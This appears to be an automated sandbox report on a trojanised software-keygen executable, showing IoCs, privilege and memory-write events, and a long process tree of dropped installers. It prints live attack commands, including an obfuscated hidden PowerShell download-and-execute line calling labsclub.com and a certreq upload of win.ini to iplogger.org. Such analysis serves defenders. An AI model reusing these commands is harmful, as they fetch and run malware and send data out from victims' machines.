68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e file.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe -
Runs .reg file with regedit 2 IoCs
pid Process 7000 regedit.exe 1564 regedit.exe -
Runs ping.exe 1 TTPs 6 IoCs
pid Process 4816 PING.EXE 7084 PING.EXE 2252 PING.EXE 4556 PING.EXE 3908 PING.EXE 3080 PING.EXE -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 85 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 89 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 172 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 436 1614537371730.exe 436 1614537371730.exe 1692 BAE9.tmp.exe 1692 BAE9.tmp.exe 2128 file.exe 2128 file.exe 4740 1614537376074.exe 4740 1614537376074.exe 2128 file.exe 2128 file.exe 2128 file.exe 2128 file.exe 2128 file.exe 2128 file.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe 660 multitimer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2496 msiexec.exe Token: SeIncreaseQuotaPrivilege 2496 msiexec.exe Token: SeSecurityPrivilege 2592 msiexec.exe Token: SeCreateTokenPrivilege 2496 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2496 msiexec.exe Token: SeLockMemoryPrivilege 2496 msiexec.exe Token: SeIncreaseQuotaPrivilege 2496 msiexec.exe Token: SeMachineAccountPrivilege 2496 msiexec.exe Token: SeTcbPrivilege 2496 msiexec.exe Token: SeSecurityPrivilege 2496 msiexec.exe Token: SeTakeOwnershipPrivilege 2496 msiexec.exe Token: SeLoadDriverPrivilege 2496 msiexec.exe Token: SeSystemProfilePrivilege 2496 msiexec.exe Token: SeSystemtimePrivilege 2496 msiexec.exe Token: SeProfSingleProcessPrivilege 2496 msiexec.exe Token: SeIncBasePriorityPrivilege 2496 msiexec.exe Token: SeCreatePagefilePrivilege 2496 msiexec.exe Token: SeCreatePermanentPrivilege 2496 msiexec.exe Token: SeBackupPrivilege 2496 msiexec.exe Token: SeRestorePrivilege 2496 msiexec.exe Token: SeShutdownPrivilege 2496 msiexec.exe Token: SeDebugPrivilege 2496 msiexec.exe Token: SeAuditPrivilege 2496 msiexec.exe Token: SeSystemEnvironmentPrivilege 2496 msiexec.exe Token: SeChangeNotifyPrivilege 2496 msiexec.exe Token: SeRemoteShutdownPrivilege 2496 msiexec.exe Token: SeUndockPrivilege 2496 msiexec.exe Token: SeSyncAgentPrivilege 2496 msiexec.exe Token: SeEnableDelegationPrivilege 2496 msiexec.exe Token: SeManageVolumePrivilege 2496 msiexec.exe Token: SeImpersonatePrivilege 2496 msiexec.exe Token: SeCreateGlobalPrivilege 2496 msiexec.exe Token: SeCreateTokenPrivilege 2496 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2496 msiexec.exe Token: SeLockMemoryPrivilege 2496 msiexec.exe Token: SeIncreaseQuotaPrivilege 2496 msiexec.exe Token: SeMachineAccountPrivilege 2496 msiexec.exe Token: SeTcbPrivilege 2496 msiexec.exe Token: SeSecurityPrivilege 2496 msiexec.exe Token: SeTakeOwnershipPrivilege 2496 msiexec.exe Token: SeLoadDriverPrivilege 2496 msiexec.exe Token: SeSystemProfilePrivilege 2496 msiexec.exe Token: SeSystemtimePrivilege 2496 msiexec.exe Token: SeProfSingleProcessPrivilege 2496 msiexec.exe Token: SeIncBasePriorityPrivilege 2496 msiexec.exe Token: SeCreatePagefilePrivilege 2496 msiexec.exe Token: SeCreatePermanentPrivilege 2496 msiexec.exe Token: SeBackupPrivilege 2496 msiexec.exe Token: SeRestorePrivilege 2496 msiexec.exe Token: SeShutdownPrivilege 2496 msiexec.exe Token: SeDebugPrivilege 2496 msiexec.exe Token: SeAuditPrivilege 2496 msiexec.exe Token: SeSystemEnvironmentPrivilege 2496 msiexec.exe Token: SeChangeNotifyPrivilege 2496 msiexec.exe Token: SeRemoteShutdownPrivilege 2496 msiexec.exe Token: SeUndockPrivilege 2496 msiexec.exe Token: SeSyncAgentPrivilege 2496 msiexec.exe Token: SeEnableDelegationPrivilege 2496 msiexec.exe Token: SeManageVolumePrivilege 2496 msiexec.exe Token: SeImpersonatePrivilege 2496 msiexec.exe Token: SeCreateGlobalPrivilege 2496 msiexec.exe Token: SeCreateTokenPrivilege 2496 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2496 msiexec.exe Token: SeLockMemoryPrivilege 2496 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2496 msiexec.exe 772 setup_10.2_us3.tmp -
Suspicious use of SetWindowsHookEx 21 IoCs
pid Process 4348 Setup.exe 4604 26FF190E7AE0F7C7.exe 4236 26FF190E7AE0F7C7.exe 4892 firefox.exe 436 1614537371730.exe 4744 firefox.exe 4740 1614537376074.exe 4644 firefox.exe 4448 1614537381340.exe 1548 tnlv2ed0qpx.exe 1720 vict.exe 4252 safebits.exe 4380 vpn.exe 4684 vict.tmp 4056 setup_10.2_us3.exe 2012 tnlv2ed0qpx.tmp 3140 vpn.tmp 4412 chashepro3.exe 772 setup_10.2_us3.tmp 4772 Setup3310.exe 4308 chashepro3.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4636 wrote to memory of 3876 4636 [CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe 78 PID 4636 wrote to memory of 3876 4636 [CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe 78 PID 4636 wrote to memory of 3876 4636 [CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe 78 PID 3876 wrote to memory of 2512 3876 cmd.exe 81 PID 3876 wrote to memory of 2512 3876 cmd.exe 81 PID 3876 wrote to memory of 2512 3876 cmd.exe 81 PID 3876 wrote to memory of 3252 3876 cmd.exe 82 PID 3876 wrote to memory of 3252 3876 cmd.exe 82 PID 3876 wrote to memory of 3252 3876 cmd.exe 82 PID 3876 wrote to memory of 528 3876 cmd.exe 83 PID 3876 wrote to memory of 528 3876 cmd.exe 83 PID 3876 wrote to memory of 528 3876 cmd.exe 83 PID 3876 wrote to memory of 932 3876 cmd.exe 84 PID 3876 wrote to memory of 932 3876 cmd.exe 84 PID 3876 wrote to memory of 932 3876 cmd.exe 84 PID 2512 wrote to memory of 4364 2512 keygen-pr.exe 85 PID 2512 wrote to memory of 4364 2512 keygen-pr.exe 85 PID 2512 wrote to memory of 4364 2512 keygen-pr.exe 85 PID 932 wrote to memory of 4348 932 keygen-step-4.exe 86 PID 932 wrote to memory of 4348 932 keygen-step-4.exe 86 PID 932 wrote to memory of 4348 932 keygen-step-4.exe 86 PID 528 wrote to memory of 4472 528 keygen-step-3.exe 87 PID 528 wrote to memory of 4472 528 keygen-step-3.exe 87 PID 528 wrote to memory of 4472 528 keygen-step-3.exe 87 PID 4364 wrote to memory of 4408 4364 key.exe 89 PID 4364 wrote to memory of 4408 4364 key.exe 89 PID 4364 wrote to memory of 4408 4364 key.exe 89 PID 4472 wrote to memory of 2252 4472 cmd.exe 90 PID 4472 wrote to memory of 2252 4472 cmd.exe 90 PID 4472 wrote to memory of 2252 4472 cmd.exe 90 PID 4348 wrote to memory of 2496 4348 Setup.exe 91 PID 4348 wrote to memory of 2496 4348 Setup.exe 91 PID 4348 wrote to memory of 2496 4348 Setup.exe 91 PID 2592 wrote to memory of 3964 2592 msiexec.exe 93 PID 2592 wrote to memory of 3964 2592 msiexec.exe 93 PID 2592 wrote to memory of 3964 2592 msiexec.exe 93 PID 4348 wrote to memory of 4604 4348 Setup.exe 94 PID 4348 wrote to memory of 4604 4348 Setup.exe 94 PID 4348 wrote to memory of 4604 4348 Setup.exe 94 PID 4348 wrote to memory of 4236 4348 Setup.exe 95 PID 4348 wrote to memory of 4236 4348 Setup.exe 95 PID 4348 wrote to memory of 4236 4348 Setup.exe 95 PID 4348 wrote to memory of 212 4348 Setup.exe 96 PID 4348 wrote to memory of 212 4348 Setup.exe 96 PID 4348 wrote to memory of 212 4348 Setup.exe 96 PID 932 wrote to memory of 4484 932 keygen-step-4.exe 97 PID 932 wrote to memory of 4484 932 keygen-step-4.exe 97 PID 212 wrote to memory of 4556 212 cmd.exe 99 PID 212 wrote to memory of 4556 212 cmd.exe 99 PID 212 wrote to memory of 4556 212 cmd.exe 99 PID 4484 wrote to memory of 4548 4484 Install.exe 100 PID 4484 wrote to memory of 4548 4484 Install.exe 100 PID 932 wrote to memory of 2128 932 keygen-step-4.exe 101 PID 932 wrote to memory of 2128 932 keygen-step-4.exe 101 PID 932 wrote to memory of 2128 932 keygen-step-4.exe 101 PID 4236 wrote to memory of 4888 4236 26FF190E7AE0F7C7.exe 103 PID 4236 wrote to memory of 4888 4236 26FF190E7AE0F7C7.exe 103 PID 4236 wrote to memory of 4888 4236 26FF190E7AE0F7C7.exe 103 PID 4604 wrote to memory of 4892 4604 26FF190E7AE0F7C7.exe 102 PID 4604 wrote to memory of 4892 4604 26FF190E7AE0F7C7.exe 102 PID 4604 wrote to memory of 4892 4604 26FF190E7AE0F7C7.exe 102 PID 4604 wrote to memory of 4892 4604 26FF190E7AE0F7C7.exe 102 PID 4604 wrote to memory of 4892 4604 26FF190E7AE0F7C7.exe 102 PID 4604 wrote to memory of 4892 4604 26FF190E7AE0F7C7.exe 102
Processes
-
C:\Users\Admin\AppData\Local\Temp\[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe"C:\Users\Admin\AppData\Local\Temp\[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:4408
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:3252
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:528 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2252
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2496
-
-
C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exeC:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe 0011 installp15⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:4892
-
-
C:\Users\Admin\AppData\Roaming\1614537371730.exe"C:\Users\Admin\AppData\Roaming\1614537371730.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614537371730.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:436
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:4744
-
-
C:\Users\Admin\AppData\Roaming\1614537376074.exe"C:\Users\Admin\AppData\Roaming\1614537376074.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614537376074.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4740
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:4644
-
-
C:\Users\Admin\AppData\Roaming\1614537381340.exe"C:\Users\Admin\AppData\Roaming\1614537381340.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614537381340.txt"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4448
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵PID:5372
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP6⤵PID:4228
-
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent6⤵PID:6340
-
C:\Users\Admin\AppData\Local\Temp\is-SFOK5.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-SFOK5.tmp\23E04C4F32EF2158.tmp" /SL5="$202C2,746887,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent7⤵PID:6384
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"8⤵PID:6516
-
-
C:\Program Files (x86)\DTS\seed.sfx.exe"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s18⤵PID:6508
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"9⤵PID:6868
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe"6⤵PID:6888
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
PID:7084
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exeC:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe 200 installp15⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4236 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:4888
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:3004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe"6⤵PID:1728
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
PID:3908
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:4556
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Users\Admin\AppData\Local\Temp\JKBQP114AI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\JKBQP114AI\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4548 -
C:\Users\Admin\AppData\Local\Temp\JKBQP114AI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\JKBQP114AI\multitimer.exe" 1 3.1614537161.603be1c98aacc 1016⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4032 -
C:\Users\Admin\AppData\Local\Temp\JKBQP114AI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\JKBQP114AI\multitimer.exe" 2 3.1614537161.603be1c98aacc7⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:660 -
C:\Users\Admin\AppData\Local\Temp\tr0mtls1rnw\vict.exe"C:\Users\Admin\AppData\Local\Temp\tr0mtls1rnw\vict.exe" /VERYSILENT /id=5358⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1720 -
C:\Users\Admin\AppData\Local\Temp\is-DGUHR.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-DGUHR.tmp\vict.tmp" /SL5="$800FE,870426,780800,C:\Users\Admin\AppData\Local\Temp\tr0mtls1rnw\vict.exe" /VERYSILENT /id=5359⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4684 -
C:\Users\Admin\AppData\Local\Temp\is-9OUD8.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-9OUD8.tmp\wimapi.exe" 53510⤵PID:5444
-
C:\Users\Admin\AppData\Local\Temp\jR7aiU4nK.exe"C:\Users\Admin\AppData\Local\Temp\jR7aiU4nK.exe"11⤵PID:6120
-
C:\Users\Admin\AppData\Local\Temp\jR7aiU4nK.exe"C:\Users\Admin\AppData\Local\Temp\jR7aiU4nK.exe"12⤵PID:1608
-
C:\Users\Admin\AppData\Local\Temp\1614537452185.exe"C:\Users\Admin\AppData\Local\Temp\1614537452185.exe"13⤵PID:6416
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe14⤵PID:7876
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:5864
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:2216
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yikmosra0rz\tnlv2ed0qpx.exe"C:\Users\Admin\AppData\Local\Temp\yikmosra0rz\tnlv2ed0qpx.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1548 -
C:\Users\Admin\AppData\Local\Temp\is-8FJDH.tmp\tnlv2ed0qpx.tmp"C:\Users\Admin\AppData\Local\Temp\is-8FJDH.tmp\tnlv2ed0qpx.tmp" /SL5="$90084,870426,780800,C:\Users\Admin\AppData\Local\Temp\yikmosra0rz\tnlv2ed0qpx.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:2012 -
C:\Users\Admin\AppData\Local\Temp\is-1ACGS.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-1ACGS.tmp\winlthst.exe" test1 test110⤵PID:5672
-
C:\Users\Admin\AppData\Local\Temp\CF7Nl6MnJ.exe"C:\Users\Admin\AppData\Local\Temp\CF7Nl6MnJ.exe"11⤵PID:5508
-
C:\Users\Admin\AppData\Local\Temp\CF7Nl6MnJ.exe"C:\Users\Admin\AppData\Local\Temp\CF7Nl6MnJ.exe"12⤵PID:812
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:1724
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:1532
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wuepkyfvh14\0yqqfwgpv4q.exe"C:\Users\Admin\AppData\Local\Temp\wuepkyfvh14\0yqqfwgpv4q.exe" 57a764d042bf88⤵
- Executes dropped EXE
PID:4852 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\SO39YA0RGA\SO39YA0RG.exe" 57a764d042bf8 & exit9⤵PID:3520
-
C:\Program Files\SO39YA0RGA\SO39YA0RG.exe"C:\Program Files\SO39YA0RGA\SO39YA0RG.exe" 57a764d042bf810⤵PID:5400
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\iol3xq0lddl\vpn.exe"C:\Users\Admin\AppData\Local\Temp\iol3xq0lddl\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4380 -
C:\Users\Admin\AppData\Local\Temp\is-BOHK4.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-BOHK4.tmp\vpn.tmp" /SL5="$9007C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\iol3xq0lddl\vpn.exe" /silent /subid=4829⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3140 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:3116
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:4148
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:6636
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:7092
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:6540
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:5072
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rm1eaetoqdp\bcjy5pnxzjx.exe"C:\Users\Admin\AppData\Local\Temp\rm1eaetoqdp\bcjy5pnxzjx.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
PID:4404 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 6489⤵
- Program crash
PID:5660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 6609⤵
- Program crash
PID:5752
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 6649⤵
- Program crash
PID:5816
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 6329⤵
- Program crash
PID:6052
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 8889⤵
- Program crash
PID:5688
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 9049⤵
- Program crash
PID:5924
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 11929⤵
- Program crash
PID:184
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 11609⤵
- Program crash
PID:1292
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 13089⤵
- Program crash
PID:216
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 12849⤵
- Program crash
PID:364
-
-
-
C:\Users\Admin\AppData\Local\Temp\gnwdyyfjsbl\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\gnwdyyfjsbl\chashepro3.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4412 -
C:\Users\Admin\AppData\Local\Temp\is-NTDN1.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-NTDN1.tmp\chashepro3.tmp" /SL5="$102DE,3362400,58368,C:\Users\Admin\AppData\Local\Temp\gnwdyyfjsbl\chashepro3.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4308 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1hTS97 %windir%\\win.ini %temp%\\2 & del %temp%\\210⤵PID:2172
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1hTS97 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\211⤵PID:5176
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1hTS97"10⤵PID:4516
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"10⤵PID:3076
-
-
C:\Program Files (x86)\JCleaner\gl.exe"C:\Program Files (x86)\JCleaner\gl.exe"10⤵PID:4592
-
C:\Program Files (x86)\JCleaner\gl.exe"C:\Program Files (x86)\JCleaner\gl.exe"11⤵PID:4720
-
-
-
C:\Program Files (x86)\JCleaner\ww.exe"C:\Program Files (x86)\JCleaner\ww.exe"10⤵PID:4084
-
C:\Program Files (x86)\JCleaner\ww.exe"C:\Program Files (x86)\JCleaner\ww.exe"11⤵PID:4552
-
-
-
